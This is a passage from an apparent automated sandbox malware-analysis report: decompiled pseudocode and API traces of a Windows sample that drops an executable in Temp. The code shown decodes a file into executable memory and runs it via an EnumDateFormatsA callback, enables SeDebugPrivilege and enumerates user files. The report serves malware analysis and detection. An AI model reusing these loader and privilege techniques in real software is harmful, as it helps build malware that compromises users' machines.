                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                          • API String ID: 3356406503-2299812867
                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                          • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                          • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403B21() {
                          				void* _t2;
                          				void* _t3;
                          				void* _t6;
                          				void* _t8;
                          
                          				_t8 =  *0x4216cc;
                          				_t3 = E00403B06(_t2, 0);
                          				if(_t8 != 0) {
                          					do {
                          						_t6 = _t8;
                          						_t8 =  *_t8;
                          						FreeLibrary( *(_t6 + 8));
                          						_t3 = GlobalFree(_t6);
                          					} while (_t8 != 0);
                          				}
                          				 *0x4216cc =  *0x4216cc & 0x00000000;
                          				return _t3;
                          			}







                          0x00403b22
                          0x00403b2a
                          0x00403b31
                          0x00403b34
                          0x00403b34
                          0x00403b36
                          0x00403b3b
                          0x00403b42
                          0x00403b48
                          0x00403b4c
                          0x00403b4d
                          0x00403b55

                          APIs
                          • FreeLibrary.KERNEL32(?,76CDFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                          • GlobalFree.KERNEL32 ref: 00403B42
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1100898210-3081826266
                          • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                          • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                          • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                          • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
                          				int _v8;
                          				int _t12;
                          				int _t14;
                          				int _t15;
                          				CHAR* _t17;
                          				CHAR* _t27;
                          
                          				_t12 = lstrlenA(_a8);
                          				_t27 = _a4;
                          				_v8 = _t12;
                          				while(lstrlenA(_t27) >= _v8) {
                          					_t14 = _v8;
                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                          					_t15 = lstrcmpiA(_t27, _a8);
                          					_t27[_v8] =  *(_t14 + _t27);
                          					if(_t15 == 0) {
                          						_t17 = _t27;
                          					} else {
                          						_t27 = CharNextA(_t27);
                          						continue;
                          					}
                          					L5:
                          					return _t17;
                          				}
                          				_t17 = 0;
                          				goto L5;
                          			}









                          0x00405f6c
                          0x00405f6e
                          0x00405f71
                          0x00405f9d
                          0x00405f76
                          0x00405f7f
                          0x00405f84
                          0x00405f8f
                          0x00405f92
                          0x00405fae
                          0x00405f94
                          0x00405f9b
                          0x00000000
                          0x00405f9b
                          0x00405fa7
                          0x00405fab
                          0x00405fab
                          0x00405fa5
                          0x00000000

                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F84
                          • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                          • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                          • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                          • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                          • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:100%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00401000

                          Control-flow Graph

                          C-Code - Quality: 79%
                          			_entry_(void* __ecx) {
                          				int _v8;
                          				struct _IO_FILE* _t7;
                          				_Unknown_base(*)()* _t8;
                          				int _t10;
                          				void* _t11;
                          				_Unknown_base(*)()* _t12;
                          				void* _t15;
                          				void* _t18;
                          				void* _t19;
                          
                          				_t19 = 0;
                          				_t7 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                          				__imp___wfopen( *((intOrPtr*)(_t7 + 4)), 0x4020d0, _t15, _t18, _t11, __ecx); // executed
                          				_t8 = VirtualAlloc(0, 0x1347, 0x3000, 0x40); // executed
                          				_t12 = _t8;
                          				fread(_t12, 0x1347, 1, _t7); // executed
                          				do {
                          					 *((char*)(_t12 + _t19)) =  *((char*)(_t12 + _t19)) + 0x5d;
                          					_t19 = _t19 + 1;
                          				} while (_t19 < 0x1347);
                          				_t10 = EnumDateFormatsA(_t12, 0, 0); // executed
                          				return _t10;
                          			}












                          0x0040100a
                          0x00401014
                          0x00401022
                          0x0040103a
                          0x00401043
                          0x0040104b
                          0x00401054
                          0x00401054
                          0x00401058
                          0x00401059
                          0x00401066
                          0x00401072

                          APIs
                          • GetCommandLineW.KERNEL32(?), ref: 0040100D
                          • CommandLineToArgvW.SHELL32(00000000), ref: 00401014
                          • _wfopen.MSVCRT ref: 00401022
                          • VirtualAlloc.KERNELBASE(00000000,00001347,00003000,00000040), ref: 0040103A
                          • fread.MSVCRT ref: 0040104B
                          • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00401066
                          Memory Dump Source
                          • Source File: 00000001.00000002.271621602.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.271613228.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.271629904.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_dehbibhar.jbxd
                          Similarity
                          • API ID: CommandLine$AllocArgvDateEnumFormatsVirtual_wfopenfread
                          • String ID:
                          • API String ID: 4923503-0
                          • Opcode ID: 2dd31745526dae1c056f71a9e8c32bc38326628a30a5eff7932bd87245bf3163
                          • Instruction ID: 22c27245844ef6e91babb69612317e02de3b0df1fbcebab1c34e83653e0a5ec4
                          • Opcode Fuzzy Hash: 2dd31745526dae1c056f71a9e8c32bc38326628a30a5eff7932bd87245bf3163
                          • Instruction Fuzzy Hash: 00F062716407047BE7202765AE4EFAB7A6CEB06755F104071FB09B90E2D6F9A940C6AC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                          C-Code - Quality: 85%
                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				struct _WIN32_FIND_DATAW _v596;
                          				void* __ebx;
                          				void* _t35;
                          				void* _t40;
                          				int _t43;
                          				void* _t52;
                          				int _t56;
                          				intOrPtr _t60;
                          				void* _t66;
                          				void* _t73;
                          				void* _t74;
                          				WCHAR* _t98;
                          				void* _t99;
                          				void* _t100;
                          				void* _t101;
                          				WCHAR* _t102;
                          				void* _t103;
                          				void* _t104;
                          
                          				L004067C4(0xa); // executed
                          				_t72 = 0;
                          				_t100 = 0x2e;
                          				_t106 = _a16;
                          				if(_a16 == 0) {
                          					L15:
                          					_push(_a8);
                          					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                          					_t104 = _t103 + 0xc;
                          					if(_t98 == 0) {
                          						L30:
                          						__eflags = 0;
                          						return 0;
                          					}
                          					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                          					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                          					_t73 = _t35;
                          					if(_t73 == 0xffffffff) {
                          						L29:
                          						E00402BAB(_t98);
                          						goto L30;
                          					}
                          					L17:
                          					while(1) {
                          						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                          							if(_v596.dwFileAttributes != 0x10) {
                          								L21:
                          								_push( &(_v596.cFileName));
                          								_t40 = E00405B6F(_t124, L"%s\\%s", _a4); // executed
                          								_t101 = _t40;
                          								_t104 = _t104 + 0xc;
                          								if(_t101 == 0) {
                          									goto L24;
                          								}
                          								if(_a12 == 0) {
                          									E00402BAB(_t98);
                          									E00403BEF(_t73);
                          									return _t101;
                          								}
                          								_a12(_t101);
                          								E00402BAB(_t101);
                          								goto L24;
                          							}
                          							_t124 = _a20;
                          							if(_a20 == 0) {
                          								goto L24;
                          							}
                          							goto L21;
                          						} else {
                          							L24:
                          							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                          							_t43 = FindNextFileW(_t73,  &_v596); // executed
                          							if(_t43 == 0) {
                          								E00403BEF(_t73); // executed
                          								goto L29;
                          							}
                          							_t100 = 0x2e;
                          							continue;
                          						}
                          					}
                          				}
                          				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                          				if(_t102 == 0) {
                          					L14:
                          					_t100 = 0x2e;
                          					goto L15;
                          				}
                          				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                          				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                          				_t74 = _t52;
                          				if(_t74 == 0xffffffff) {
                          					L13:
                          					E00402BAB(_t102);
                          					_t72 = 0;
                          					goto L14;
                          				} else {
                          					goto L3;
                          				}
                          				do {
                          					L3:
                          					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                          						goto L11;
                          					}
                          					if(_a24 == 0) {
                          						L7:
                          						if(E00405D24( &(_v596.cFileName)) >= 3) {
                          							L9:
                          							_push( &(_v596.cFileName));
                          							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                          							_t103 = _t103 + 0xc;
                          							_a16 = _t60;
                          							_t115 = _t60;
                          							if(_t60 == 0) {
                          								goto L11;
                          							}
                          							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                          							E00402BAB(_a16);
                          							_t103 = _t103 + 0x1c;
                          							if(_t99 != 0) {
                          								E00402BAB(_t102);
                          								E00403BEF(_t74);
                          								return _t99;
                          							}
                          							goto L11;
                          						}
                          						_t66 = 0x2e;
                          						_t114 = _v596.cFileName - _t66;
                          						if(_v596.cFileName == _t66) {
                          							goto L11;
                          						}
                          						goto L9;
                          					}
                          					_push(L"Windows");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					_push(L"Program Files");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					goto L7;
                          					L11:
                          					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                          					_t56 = FindNextFileW(_t74,  &_v596); // executed
                          				} while (_t56 != 0);
                          				E00403BEF(_t74); // executed
                          				goto L13;
                          			}





















                          0x00403d82
                          0x00403d88
                          0x00403d8c
                          0x00403d8d
                          0x00403d90
                          0x00403ea9
                          0x00403ea9
                          0x00403eb9
                          0x00403ebb
                          0x00403ec0
                          0x00403f95
                          0x00403f95
                          0x00000000
                          0x00403f95
                          0x00403ece
                          0x00403edb
                          0x00403edd
                          0x00403ee2
                          0x00403f8e
                          0x00403f8f
                          0x00000000
                          0x00403f94
                          0x00000000
                          0x00403ee8
                          0x00403ef8
                          0x00403f0a
                          0x00403f12
                          0x00403f18
                          0x00403f21
                          0x00403f26
                          0x00403f28
                          0x00403f2d
                          0x00000000
                          0x00000000
                          0x00403f33
                          0x00403f76
                          0x00403f7c
                          0x00000000
                          0x00403f83
                          0x00403f36
                          0x00403f3a
                          0x00000000
                          0x00403f40
                          0x00403f0c
                          0x00403f10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403f41
                          0x00403f41
                          0x00403f4b
                          0x00403f58
                          0x00403f5c
                          0x00403f88
                          0x00000000
                          0x00403f8d
                          0x00403f60
                          0x00000000
                          0x00403f60
                          0x00403ef8
                          0x00403ee8
                          0x00403da3
                          0x00403da9
                          0x00403ea6
                          0x00403ea8
                          0x00000000
                          0x00403ea8
                          0x00403db7
                          0x00403dc4
                          0x00403dc6
                          0x00403dcb
                          0x00403e9d
                          0x00403e9e
                          0x00403ea4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403dd1
                          0x00403dd1
                          0x00403dd8
                          0x00000000
                          0x00000000
                          0x00403de2
                          0x00403e12
                          0x00403e22
                          0x00403e30
                          0x00403e36
                          0x00403e3f
                          0x00403e44
                          0x00403e47
                          0x00403e4a
                          0x00403e4c
                          0x00000000
                          0x00000000
                          0x00403e63
                          0x00403e65
                          0x00403e6a
                          0x00403e6f
                          0x00403f64
                          0x00403f6a
                          0x00000000
                          0x00403f71
                          0x00000000
                          0x00403e6f
                          0x00403e26
                          0x00403e27
                          0x00403e2e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e2e
                          0x00403dea
                          0x00403df9
                          0x00000000
                          0x00000000
                          0x00403e01
                          0x00403e10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e75
                          0x00403e7f
                          0x00403e8c
                          0x00403e8e
                          0x00403e97
                          0x00000000

                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID: %s\%s$%s\*$Program Files$Windows
                          • API String ID: 1690352074-2009209621
                          • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                          • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                          				void* _v8;
                          				struct _LUID _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				struct _TOKEN_PRIVILEGES _v32;
                          				intOrPtr* _t13;
                          				void* _t14;
                          				int _t16;
                          				int _t31;
                          				void* _t32;
                          
                          				_t31 = 0;
                          				E004060AC();
                          				_t32 = __eax;
                          				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          				_t14 =  *_t13(_t32, 0x28,  &_v8);
                          				if(_t14 != 0) {
                          					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                          					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                          					if(_t16 != 0) {
                          						_push(__ebx);
                          						_v32.Privileges = _v16.LowPart;
                          						_v32.PrivilegeCount = 1;
                          						_v24 = _v16.HighPart;
                          						_v20 = 2;
                          						E004031E5(1, 9, 0xc1642df2, 0, 0);
                          						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                          						_t31 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_v8);
                          					return _t31;
                          				}
                          				return _t14;
                          			}













                          0x00406512
                          0x00406514
                          0x00406522
                          0x00406524
                          0x00406530
                          0x00406534
                          0x0040653f
                          0x0040654e
                          0x00406552
                          0x0040655a
                          0x0040655f
                          0x0040656d
                          0x00406570
                          0x00406573
                          0x0040657a
                          0x00406589
                          0x0040658d
                          0x00406590
                          0x00406594
                          0x00000000
                          0x0040659a
                          0x004065a1

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                          • String ID: SeDebugPrivilege
                          • API String ID: 3615134276-2896544425
                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402B7C(long _a4) {
                          				void* _t4;
                          				void* _t7;
                          
                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                          				_t7 = _t4;
                          				if(_t7 != 0) {
                          					E00402B4E(_t7, 0, _a4);
                          				}
                          				return _t7;
                          			}





                          0x00402b8c
                          0x00402b92
                          0x00402b96
                          0x00402b9e
                          0x00402ba3
                          0x00402baa

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406069(WCHAR* _a4, DWORD* _a8) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                          				_t4 = GetUserNameW(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x00406077
                          0x00406082
                          0x00406085

                          APIs
                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Memory Dump Source
                          • Source File: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_dehbibhar.jbxd
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 236 406329-40632e 232->236 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062df call 4031e5 262->273 263->257 265->266 266->236 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                          C-Code - Quality: 75%
                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                          				int _v8;
                          				long _v12;
                          				int _v16;
                          				int _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				intOrPtr* _t25;
                          				int _t27;
                          				int _t30;
                          				int _t31;
                          				int _t36;
                          				int _t37;
                          				intOrPtr* _t39;
                          				int _t40;
                          				long _t44;
                          				intOrPtr* _t45;
                          				int _t46;
                          				void* _t48;
                          				int _t49;
                          				void* _t67;
                          				void* _t68;
                          				void* _t74;
                          
                          				_t48 = __ebx;
                          				_t67 = 0;
                          				_v8 = 0;
                          				E00402BF2();
                          				_t68 = __eax;
                          				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                          				_t2 =  &_v8; // 0x414449
                          				_push(1);
                          				_push(8);
                          				_push(_t68);
                          				if( *_t25() != 0) {
                          					L4:
                          					_t27 = E00402B7C(0x208);
                          					_v20 = _t27;
                          					__eflags = _t27;
                          					if(_t27 != 0) {
                          						E0040338C(_t27, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_push(_t48);
                          					_t49 = E00402B7C(0x208);
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E0040338C(_t49, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_v28 = 0x208;
                          					_v24 = 0x208;
                          					_t7 =  &_v8; // 0x414449
                          					_v12 = _t67;
